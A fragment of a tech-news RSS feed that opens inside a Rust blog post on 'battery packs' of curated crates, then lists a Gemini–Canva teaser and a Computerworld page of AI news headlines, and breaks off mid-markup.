   ○ ✦ nrf9160 [cortex-m-rt, critical-section-impl, cortex-m, emb
   ○ ✦ rp2040 [cortex-m-rt, critical-section-impl, cortex-m, embe
   ○ ✦ stm32f0 [cortex-m-rt, critical-section-impl, cortex-m, emb
 embedded-battery-pack v0.1.0  ↑↓/jk Navigate | Space Toggle | ←/→
</code></pre><h3>Let’s talk about all the good things…</h3>
<p>So why am I so keen on battery packs? It’s largely because I’ve heard so many would-be or recent Rust adopters talk about picking crates as a challenge. But I feel they would help with some other problems as well.</p>
<p>What I really want to see is working groups in the <a href="https://rustfoundation.org/rust-commercial-network/">Rust Commercial Network</a> banding together to publish battery packs and recommendations. These would cover the dependencies that they’re actually using.</p>
<h4>Supporting maintainers</h4>
<p>One of the reasons I want to have RCN-recognized battery packs is that they are a natural focal point to then prompt RCN members to fund the maintenance of those crates. I am imagining that for each sponsored battery pack vended within the RCN, there is an associated “ecosystem fund”. Companies or individuals could sponsor this fund to get access to early patches, security disclosures, etc or other perks. The money would be used to support the maintainers of those crates, to implement missing features, and so forth.</p>
<h4>Fostering interoperability</h4>
<p>Another value-add from battery packs is the ability to drive interop efforts. I think that as soon as we start talking about standardizing, we’re also going to recognize that there are some places where standardization is hard. For example, early conversations within the <a href="https://rust-commercial-network.github.io/rcn/network-services-wg.html">network service working group</a> (unsurprisingly) immediately identified that while most people are using <a href="https://tokio.rs/">tokio</a>, some major companies are using their own runtimes internally. It’s not like the need for “async runtime interop” is <a href="https://rust-lang.github.io/wg-async/vision/submitted_stories/status_quo/barbara_wishes_for_easy_runtime_switch.html">news</a>. But right now, every crate winds up effectively implementing their own set of little traits to make it work. Sponsored battery packs offer the possibility of a neutral home for that sort of thing.</p>
<h3>…and the bad things that could be</h3>
<p>There are some risks to people using battery packs. The most obvious is that the fact that anybody can publish a battery pack may mean that you just get a ton of battery packs, which doesn’t really help anybody! I’m not so worried about this because I think that there will be a few obvious places that most people go first, and then I think once people are oriented, they’ll get excited to explore what crates.io has to offer and start discovering more niche battery packs.</p>
<h4>Avoiding stagnation</h4>
<p>Battery packs are designed to evolve. I’ve seen it happen a number of times that there is a dominant crate for something, often taking a “traditional approach”, but then somebody else comes along and presents an interesting alternative that gradually takes off. I love that and I don’t want to put it at risk.</p>
<p>One example of evolution around CLI argument parsing. For a time, <a href="https://crates.io/crates/docopt">docopt</a> was a popular way to parse command-line options. Then <a href="https://crates.io/crates/clap">clap</a> came along and presented a more structured alternative; that was nice, but then structopt came along and connected clap to an auto-derive, so you could just write your data structure and be done. And <em>that</em> was awesome. (That is now the standard in clap.) I want to be sure that, even if there is a CLI battery pack, there’s room for the next clap to come along.</p>
<p>There are a few things about battery pack that I think will help us deal with this. First, they are a “thin abstraction”. You don’t “depend on” a battery pack, you depend on the crates within it. So if a new version comes out that uses clap instead of docopt, that doesn’t impact you at all. Your code keeps working same as it ever did. And of course it helps that <em>anybody</em> can publish a battery pack. You can now have variations on battery packs that are focused around a new approach to help it get started.</p>
<p>Done right, I think that standardized battery packs can also <em>help</em> the ecosystem evolve and pivot. As it is now, knowledge of new crates has to spread by word-of-mouth. But if everybody is aligned around a new approach, adopting that new approach within a battery packs sends a clear signal that your group is aligned that something is the new hotness.</p>
<h3>…Let’s talk about crates<sup><a class="footnote-ref" href="https://smallcultfollowing.com/babysteps/atom.xml#fn:4">4</a></sup></h3>
<h4>“Always bet on the ecosystem”</h4>
<p>I see <strong>always bet on the ecosystem</strong> as a key Rust design axiom. It’s the reason we chose a small standard library and a package manager in the first place. It’s also why battery packs are designed to be published by anyone.</p>
<p>But just like plants sometimes need a trellis to grow taller, any successful ecosystem reaches a point where it needs another layer of structure to help it keep growing. Without that, you have this “layer of tacic knowledge” (in <a href="https://blog.rust-lang.org/2025/12/19/what-do-people-love-about-rust/#example-the-wealth-of-crates-on-crates-io-are-a-key-enabler-but-can-be-an-obstacle">the words of a Rust Vision Doc interviewee</a>) that becomes an obstacle for folks. And I think we’ve reached that point with <code>crates.io</code>.</p>
<p>I am hopeful that battery packs can provide that next layer of structure. But at the end of the day, if there’s a better approach, that’s fine too, so long as we find a way to help people find (<em>and fund!</em>) the crates they need. So let’s talk about it!</p>
<div class="footnotes">
<hr>
<ol>
<li>
<p>My first recollection of it was the <a href="https://internals.rust-lang.org/t/proposal-the-rust-platform/3745">Rust Platform</a> idea we floated in 2016! <a class="footnote-backref" href="https://smallcultfollowing.com/babysteps/atom.xml#fnref:1">↩︎</a></p>
</li>
<li>
<p>Yo dawg… <a class="footnote-backref" href="https://smallcultfollowing.com/babysteps/atom.xml#fnref:2">↩︎</a></p>
</li>
<li>
<p>Hat tip to Jess Izen, who proposed and developed the CI battery pack. Neat idea. <a class="footnote-backref" href="https://smallcultfollowing.com/babysteps/atom.xml#fnref:3">↩︎</a></p>
</li>
<li>
<p>Oh, and: my apologies to <a href="https://en.wikipedia.org/wiki/Let's_Talk_About_Sex">Salt-N-Peppa</a>. <a class="footnote-backref" href="https://smallcultfollowing.com/babysteps/atom.xml#fnref:4">↩︎</a></p>
</li>
</ol>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Gemini Now Connects to Canva in Google Search]]></title>
<description><![CDATA[We are all aware of the epidemic that has spread across social media and even made its way to physically printed sheets and banners. I’m referring to AI-generated flyers. Whether it be for an event or a service, all of these flyers look the same, as they are all being created from the same templa...]]></description>
<link>https://tsecurity.de/de/3674038/it-nachrichten/gemini-now-connects-to-canva-in-google-search/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3674038/it-nachrichten/gemini-now-connects-to-canva-in-google-search/</guid>
<pubDate>Thu, 16 Jul 2026 18:18:26 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>We are all aware of the epidemic that has spread across social media and even made its way to physically printed sheets and banners. I’m referring to AI-generated flyers. Whether it be for an event or a service, all of these flyers look the same, as they are all being created from the same template....</p>
<p>Read the original post: <a href="https://www.droid-life.com/2026/07/16/gemini-now-connects-to-canva-in-google-search/">Gemini Now Connects to Canva in Google Search</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Artificial Intelligence]]></title>
<description><![CDATA[Latest from todaynewsDeepMind CEO again pushes for a frontier AI standards bodyDemis Hassabis argues that a US government-led industry effort is needed to keep AGI-like developments safe; analysts aren’t so sure.By Evan SchumanJul 15, 20268 minsArtificial IntelligenceGovernmentLaws and Regulation...]]></description>
<link>https://tsecurity.de/de/3671869/ai-nachrichten/artificial-intelligence/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671869/ai-nachrichten/artificial-intelligence/</guid>
<pubDate>Wed, 15 Jul 2026 23:02:40 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><section class="latest-content"><div class="container"><header class="latest-content__header"><h2 class="latest-content__title sr-only"><span>Latest from today</span></h2></header><div class="grid latest-content__content"><div class="col-12 col-7@md col-8@lg"><div class="latest-content__content-featured"><a class="card card--xxl " href="https://www.computerworld.com/article/4197511/deepmind-ceo-again-pushes-for-a-frontier-ai-standards-body-2.html" aria-label="Go to content"><div class="card__header"><span class="card__content-type">news</span></div><div class="card__image"><div class="insider-image"><div class="image"><img width="400px" src="https://www.computerworld.com/wp-content/uploads/2026/07/4197511-0-18848000-1784149211-shutterstock_2540223947.jpg?quality=50&amp;strip=all&amp;w=1046" data-id="idg_render_hero_index_one_card_image" sizes="
            (min-resolution: 3dppx) and (max-width: 600px) 900px,
            (min-resolution: 3dppx) and (max-width: 1200px) 1200px,

            (min-resolution: 2dppx) and (max-width: 600px) 900px,
            (min-resolution: 2dppx) and (max-width: 1200px) 1200px,

            (min-resolution: 1dppx) and (max-width: 600px) 900px,
            (min-resolution: 1dppx) and (max-width: 2000px) 1300px" alt="Image" loading="eager"></div></div></div><h3 class="card__title">DeepMind CEO again pushes for a frontier AI standards body</h3><p class="card__description">Demis Hassabis argues that a US government-led industry effort is needed to keep AGI-like developments safe; analysts aren’t so sure.</p><div class="card__info"><span>By Evan Schuman</span></div><div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T20:59:29+00:00">Jul 15, 2026</span></span><span>8 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Government</span></span><span class="card__tag"><span class="tag">Laws and Regulations</span></span></div></a>
		</div><div class="grid grid--cols-7@md grid--cols-8@lg latest-content__content-main"><div class="col-12 col-7@md col-4@lg latest-content__card-main"><a class="card " href="https://www.computerworld.com/article/4197437/apples-openai-lawsuit-the-lunacy-of-trying-to-limit-what-ex-employees-can-tell-future-employers.html" aria-label="Go to content"><div class="card__header"><span class="card__content-type">opinion</span></div><div class="card__image">
			<div class="insider-image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4197437-0-98299000-1784131210-thinkstockphotos-493608259-100632547-orig.jpg?quality=50&amp;strip=all&amp;w=697" data-id="idg_render_hero_index_two_three_break" sizes="(min-resolution: 3dppx) and (max-width: 600px) 600px,
            (min-resolution: 3dppx) and (max-width: 1200px) 900px,

            (min-resolution: 2dppx) and (max-width: 600px) 600px,
            (min-resolution: 2dppx) and (max-width: 1200px) 900px,

            (min-resolution: 1dppx) and (max-width: 600px) 600px,
            (min-resolution: 1dppx) and (max-width: 2000px) 1024px" alt="Image"></div></div></div><h3 class="card__title">Apple’s OpenAI lawsuit: The lunacy of trying to limit what ex-employees can tell future employers</h3><div class="card__info"><span>By Evan Schuman</span></div><div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T15:59:35+00:00">Jul 15, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Government</span></span><span class="card__tag"><span class="tag">Laws and Regulations</span></span></div></a></div><div class="col-12 col-7@md col-4@lg latest-content__card-main"><span class="nativo-loading"></span><a class="card nativo" href="https://www.computerworld.com/article/4197338/what-problems-would-an-ai-speaker-from-openai-actually-solve.html" aria-label="Go to content"><div class="card__header"><span class="card__content-type">opinion</span></div><div class="card__image">
			<div class="insider-image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/07/4197338-0-98391100-1784130807-Apple-HomePod-mini-color-lineup.jpg?quality=50&amp;strip=all&amp;w=697" data-id="idg_render_hero_index_two_three_break" sizes="(min-resolution: 3dppx) and (max-width: 600px) 600px,
            (min-resolution: 3dppx) and (max-width: 1200px) 900px,

            (min-resolution: 2dppx) and (max-width: 600px) 600px,
            (min-resolution: 2dppx) and (max-width: 1200px) 900px,

            (min-resolution: 1dppx) and (max-width: 600px) 600px,
            (min-resolution: 1dppx) and (max-width: 2000px) 1024px" alt="Image"></div></div></div><h3 class="card__title">What problems would an AI speaker from OpenAI actually solve?</h3><div class="card__info"><span>By Jonny Evans</span></div><div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T15:52:45+00:00">Jul 15, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Vendors and Providers</span></span></div></a></div></div></div><div class="col-12 col-5@md col-4@lg latest-content__content-secondary"><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4192438/how-to-unionize-your-tech-workplace.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">feature</span></div><h3 class="card__title">How to unionize your tech workplace</h3><div class="card__info"><span>By Robert Mitchell</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T11:00:00+00:00">Jul 15, 2026</span></span><span>18 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Careers</span></span><span class="card__tag"><span class="tag">IT Jobs</span></span><span class="card__tag"><span class="tag">Technology Industry</span></span></div></a>
		</div><div class="latest-content__card-secondary"><span class="nativo-loading"></span><a class="card nativo" href="https://www.computerworld.com/article/1613762/android-widgets.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">tip</span></div><h3 class="card__title">5 wild ways to make Android widgets more useful</h3><div class="card__info"><span>By JR Raphael</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T09:45:00+00:00">Jul 15, 2026</span></span><span>12 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Android</span></span><span class="card__tag"><span class="tag">Mobile Apps</span></span><span class="card__tag"><span class="tag">Smartphones</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4197029/microsoft-is-forcing-an-enterprise-transition-to-passkeys.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">news</span></div><h3 class="card__title">Microsoft is forcing an enterprise transition to passkeys</h3><div class="card__info"><span>By Taryn Plumb</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-15T02:04:06+00:00">Jul 14, 2026</span></span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Access Control</span></span><span class="card__tag"><span class="tag">Authentication</span></span><span class="card__tag"><span class="tag">Identity and Access Management</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4196704/siri-ai-steals-the-show-as-the-ios-27-public-beta-lands.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">news</span></div><h3 class="card__title">Siri AI steals the show as the iOS 27 public beta lands</h3><div class="card__info"><span>By Jonny Evans</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-14T15:47:35+00:00">Jul 14, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Operating Systems</span></span><span class="card__tag"><span class="tag">iOS</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4196309/with-its-latest-layoffs-microsoft-goes-all-in-on-ai.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">opinion</span></div><h3 class="card__title">With its latest layoffs, Microsoft goes all in on AI</h3><div class="card__info"><span>By Preston Gralla</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-14T11:00:00+00:00">Jul 14, 2026</span></span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">IT Strategy</span></span><span class="card__tag"><span class="tag">Microsoft</span></span></div></a>
		</div><div class="latest-content__card-secondary"><a class="card " href="https://www.computerworld.com/article/4196652/forg365-industrializes-microsoft-365-phishing-with-ai-generated-lures.html" aria-label="Go to content"><div class="card__header"> <span class="card__content-type">news</span></div><h3 class="card__title">Forg365 industrializes Microsoft 365 phishing with AI-generated lures</h3><div class="card__info"><span>By Prasanth Aby Thomas</span></div>
		<div class="card__info card__info--light"><span><span itemprop="datePublished" content="2026-07-14T09:51:16+00:00">Jul 14, 2026</span></span><span>4 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Microsoft 365</span></span><span class="card__tag"><span class="tag">Office Suites</span></span><span class="card__tag"><span class="tag">Productivity Software</span></span></div></a>
		</div></div></div></div></section><div class="advert">
						<div class="container advert__container">
							<div class="advert__content">
								<div class="ad page-ad has-ad-prefix ad-article" data-ad-template="article" data-ofp="false"></div>
							</div>
						</div>
					</div><div class="content-listing-articles"><div class="container"><h2 class="content-listing-articles__title">Articles</h2><div class="content-listing-articles__container content-listing-articles__container--collapsed" data-collapse-articles="6" data-content-listing-articles><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4196365/openclaw-becomes-a-nonprofit-foundation-as-it-seeks-to-be-the-switzerland-of-ai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">OpenClaw becomes a nonprofit foundation as it seeks to be ‘the Switzerland of AI’</h3><p class="card__description">Analysts and consultants applaud the move as potentially delivering the development consistency that the current offerings lack, but some worry that treating the company as neutral is a mistake.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Evan Schuman</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>8 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Nonprofits</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4196262/ai-is-killing-low-cost-smartphones.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news analysis</span></div><h3 class="card__title">AI is killing low cost smartphones</h3><p class="card__description">Data from Omdia and Counterpoint shows that while Apple and Samsung thrive, the rest of the industry takes a dive</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Jonny Evans</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Mobile Phones</span></span><span class="card__tag"><span class="tag">Smartphones</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4196220/meta-pulls-instagram-ai-feature-amid-privacy-concerns.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Meta pulls Instagram AI feature amid privacy concerns</h3><p class="card__description">By specifying a public account, users could allow the AI ​​model to use the person’s images as a reference without the account holder being notified.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Viktor Eriksson</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>1 min</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Instagram</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4195176/qa-how-google-plans-to-reinvent-the-spreadsheet-with-ai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">feature</span></div><h3 class="card__title">Q&amp;A: How Google plans to reinvent the spreadsheet with AI</h3><p class="card__description">Soon, Google wants to see AI doing the spreadsheet busywork, says Eric Birnbaum, director of product management for Google Sheets.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Matthew Finnegan</span></div> <div class="card__info card__info--light"><span>Jul 13, 2026 </span><span>10 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Google Sheets</span></span><span class="card__tag"><span class="tag">Google Workspace</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4194931/physical-ai-will-see-the-fusion-of-robotics-and-ai-transform-the-world.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">brandpost</span><span class="card__sponsor-text">Sponsored by Tether</span></div><h3 class="card__title">Physical AI will see the fusion of robotics and AI transform the world</h3><p class="card__description"></p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By tether</span></div> <div class="card__info card__info--light"><span>Jul 9, 2026 </span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news analysis</span></div><h3 class="card__title">‘Rotten to its core’ — Apple files an explosive lawsuit against OpenAI</h3><p class="card__description">Apple accuses OpenAI and former Apple Vice President Tang Tan of extensive coordinated data theft and asks whether OpenAI’s hardware plans are based around exfiltrated Apple info.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Jonny Evans</span></div> <div class="card__info card__info--light"><span>Jul 11, 2026 </span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div></div></a></div><div class="content-listing-articles__row "><a class="grid content-row-article" href="https://www.computerworld.com/article/4195657/apple-is-prepping-for-life-after-the-ai-gold-rush.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">opinion</span></div><h3 class="card__title">Apple is prepping for life after the AI gold rush</h3><p class="card__description">The company's interest in compression of AI models is the right approach.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Jonny Evans</span></div> <div class="card__info card__info--light"><span>Jul 11, 2026 </span><span>6 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195678/microsoft-exchange-server-on-prem-gets-a-little-harder-to-use.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Microsoft Exchange Server on prem gets a little harder to use</h3><p class="card__description">The lightweight web client is going away, placing more demands on systems still clinging to Microsoft’s on-prem email system.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Maxwell Cooter</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>2 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Email Clients</span></span><span class="card__tag"><span class="tag">Microsoft Exchange</span></span><span class="card__tag"><span class="tag">Microsoft Outlook</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195636/mistral-joins-rush-to-build-physical-ai.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Mistral joins rush to build physical AI</h3><p class="card__description">Its Robostral Navigate AI model needs input from just one color camera, doing without Lidar, depth sensors, or multiple viewpoints.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Maxwell Cooter</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>2 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Robotics</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195628/apple-will-buy-more-us-made-components-from-broadcom.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Apple will buy more US-made components from Broadcom</h3><p class="card__description">Chips and thin-film bulk acoustic resonator (FBAR) filters are on the menu.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Maxwell Cooter</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>2 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Apple</span></span><span class="card__tag"><span class="tag">Networking</span></span><span class="card__tag"><span class="tag">Wi-Fi</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195528/meta-launches-low-cost-muse-spark-1-1-as-enterprise-ai-spending-comes-under-scrutiny-2.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">Meta launches low-cost Muse Spark 1.1 as enterprise AI spending comes under scrutiny</h3><p class="card__description">Meta says the model delivers competitive performance against OpenAI, Anthropic, and Google offerings while costing a fraction as much to run.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Anirban Ghoshal</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/1614899/android-contacts-management-ultimate-guide.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">how-to</span></div><h3 class="card__title">The ultimate guide to Android contacts management</h3><p class="card__description">Your Android phone's contacts are much more than just a glorified Rolodex. Ready for an unexpected productivity upgrade? </p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By JR Raphael</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>16 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Android</span></span><span class="card__tag"><span class="tag">Google</span></span><span class="card__tag"><span class="tag">Productivity Software</span></span></div></div></div></a></div><div class="content-listing-articles__row content-listing-articles__row--hide"><a class="grid content-row-article" href="https://www.computerworld.com/article/4195494/openai-launches-chatgpt-work-as-it-broadens-gpt-5-6-rollout-2.html" aria-label="Go to content"><div class="col-12 col-7@md content-row-article__main"><div class="card card--lg"><div class="card__header"><span class="card__content-type">news</span></div><h3 class="card__title">OpenAI launches ChatGPT Work as it broadens GPT-5.6 rollout</h3><p class="card__description">The enterprise AI agent combines ChatGPT, Codex, and GPT-5.6 to automate workplace tasks as OpenAI broadens rollout of its latest frontier models.</p></div></div><div class="col-12 col-4@md col-start-9@md content-row-article__secondary"><div class="card card--lg"><div class="card__info"><span>By Gyana Swain</span></div> <div class="card__info card__info--light"><span>Jul 10, 2026 </span><span>5 mins</span></div><div class="card__tags"><span class="card__tag"><span class="tag">Artificial Intelligence</span></span><span class="card__tag"><span class="tag">Generative AI</span></span><span class="card__tag"><span class="tag">Productivity Software</span></span></div></div></div></a></div></div><div class="grid content-listing-articles__button-wrapper">
			<div class="col-6 col-4@md col-start-5@md"><div class="content-listing-articles__button-show">
					<button class="button button--tertiary" type="button" data-toggle="expand">
						<span>Show more</span>
						<span>
							<svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
								<use xlink:href="#icon-chevron-down"></use>
							</svg>
						</span>
					</button>
				</div>
				<div class="content-listing-articles__button-show content-listing-articles__button-show--hide">
					<button class="button button--tertiary" type="button" data-toggle="collapse">
						<span>Show less</span>
						<span>
							<svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
								<use xlink:href="#icon-chevron-up"></use>
							</svg>
						</span>
					</button>
				</div></div><div class="col-6 col-4@md content-listing-articles__button-view-all">
						<a class="button" href="https://www.computerworld.com/artificial-intelligence/feed/page/2/" target="_blank"> View all </a></div></div></div></div><section class="suggested-content-upcoming-events"><div class="container">
				<h2 class="suggested-content-upcoming-events__title">Upcoming Events</h2><a class="grid suggested-content-upcoming-events__item" href="https://event.foundryco.com/cio-100-uk/" aria-label="Go to content"><div class="col-12 col-3@md suggested-content-upcoming-events__date-label dd"><span class="date-label">Sep/24</span></div><div class="col-12 col-4@md col-5@xl suggested-content-upcoming-events__image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/03/4141846-0-37933000-1772809522-CIO-Summit-2025_17.jpg?quality=50&amp;strip=all&amp;w=1045" alt="Image"></div></div>
			<div class="col-12 col-5@md col-4@xl suggested-content-upcoming-events__card">
				<div class="card card--xl">
					<div class="card__header"><span class="card__content-type">conference</span><span class="card__external-link-icon" data-url="https://event.foundryco.com/cio-100-uk/"><svg class="icon icon--sm" viewbox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <use xlink:href="#icon-arrow-up-right-from-square"></use></svg></span></div><h3 class="card__title">CIO 100 Awards &amp; Conference UK</h3><div class="card__info card__info--light"><span>24 Sep 2026</span><span>London, UK</span></div>
		<div class="card__tags"><span class="card__tag"><span class="tag">Microsoft 365</span></span></div></div>
			</div>
		</a><a class="grid suggested-content-upcoming-events__item" href="https://event.foundryco.com/cso-awards-conference-uk/" aria-label="Go to content"><div class="col-12 col-3@md suggested-content-upcoming-events__date-label dd"><span class="date-label">Nov/26</span></div><div class="col-12 col-4@md col-5@xl suggested-content-upcoming-events__image"><div class="image"><img width="400px" loading="lazy" src="https://www.computerworld.com/wp-content/uploads/2026/06/4141741-0-97812100-1780312469-60CB82BE-5D6E-40E0-8E5E-0151C8C46E7F.jpg?quality=50&amp;strip=all&amp;w=929" alt="Image"></div></div>
			<div class="col-12 col-5@md col-4@xl suggested-content-upcoming-events__card">
				<div class="card card--xl">
